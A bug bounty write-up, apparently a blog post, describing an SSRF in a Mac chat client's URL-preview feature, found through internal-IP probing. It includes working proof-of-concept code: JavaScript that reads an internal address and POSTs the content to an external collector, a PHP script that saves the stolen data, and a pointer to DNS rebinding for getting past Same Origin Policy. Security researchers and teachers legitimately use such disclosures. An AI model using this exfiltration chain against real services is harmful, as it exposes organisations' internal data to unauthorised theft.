[bugbounty] A Simple SSRF


I was working on a private program which i cannot disclose
First of all, its web assets have several subdomains. After I tested it for a while, I plan to look at the mac client.
The mac client has an chat interface where i found a SSRF.

The following is the whole process

After installation, sign up for login, then I see a chat interface.
Send a URL
enter image description here
It seems to preview the url, return a title and favicons
I use my server ip to test. Then received
enter image description here
Found that is the browser's ua header
Then I tested it http://127.0.0.1 https://127.0.0.1 file://etc/passwd ....
Tested a lot of common internal ip
But
enter image description here enter image description here
No effect
Then I tried the subdomain brute force, as well as some asset discovery sites to find internal ip
Until there is an ip
enter image description here
Seems to be successful
Then I quickly submitted the vulnerability
But
enter image description here
As written above, we can only get a very small amount of content.
After testing, I found that it will also execute js because it is browser ua
<html><p id='d1'></p>
<script>
    function get(url) {
        try {
            var req = new XMLHttpRequest();
            req.open('GET', url, false);
            req.send(null);
            if(req.status == 200)
                return req.responseText;
        } catch(err) {
        }
        return null;
    }
    var role = get('https://google.com');
    document.getElementById("d1").innerHTML=role.length;
</script></html>
enter image description here

Can successfully get Google returns the content length
Does not seem to be blocked by Same Origin Policy
Then we can get any internal network content
poc
xxx.php
<?php
file_put_contents("save.txt", $_POST['cc'] . "\n", FILE_APPEND);
?>
poc.html
<html><p id='d1'></p>
<script>
function get(url) {
    try {
        var req = new XMLHttpRequest();
        req.open('GET', url, false);
        req.send(null);
        if(req.status == 200)
            return req.responseText;
    } catch(err) {
    }
    return null;
}
function post(url,content){
    var req = new XMLHttpRequest();
    req.open("POST", url, true);
    var formData = new FormData();
    formData.append("cc", content);
    req.send(formData);
}
var role = get('https://Internal ip');
post('https://xxxxxxxxxxx.com/xxx.php',escape(role));
document.getElementById("d1").innerHTML=role.length;
</script></html>
Then check save.txt (You can also use the Burp Collaborator client)
enter image description here
Url decoding
enter image description here

We are successful in getting the full content of any address on the internal network.
If Same Origin Policy blocks
Bypass Same Origin Policy with DNS-rebinding to retrieve Internal server .
enter image description here
Details from https://github.com/mpgn/ByP-SOP
Finally
enter image description here
I got the highest bounty reward for this private project.

Comments

  1. you find internal ip and then you put in chat ?

    ReplyDelete
    Replies
    1. Not really, when he send a URL vía chat, the chat render a preview of URL sended, due that was possible to enumerate internal IPs obtaining the title of the web on that host.

      Delete

Post a Comment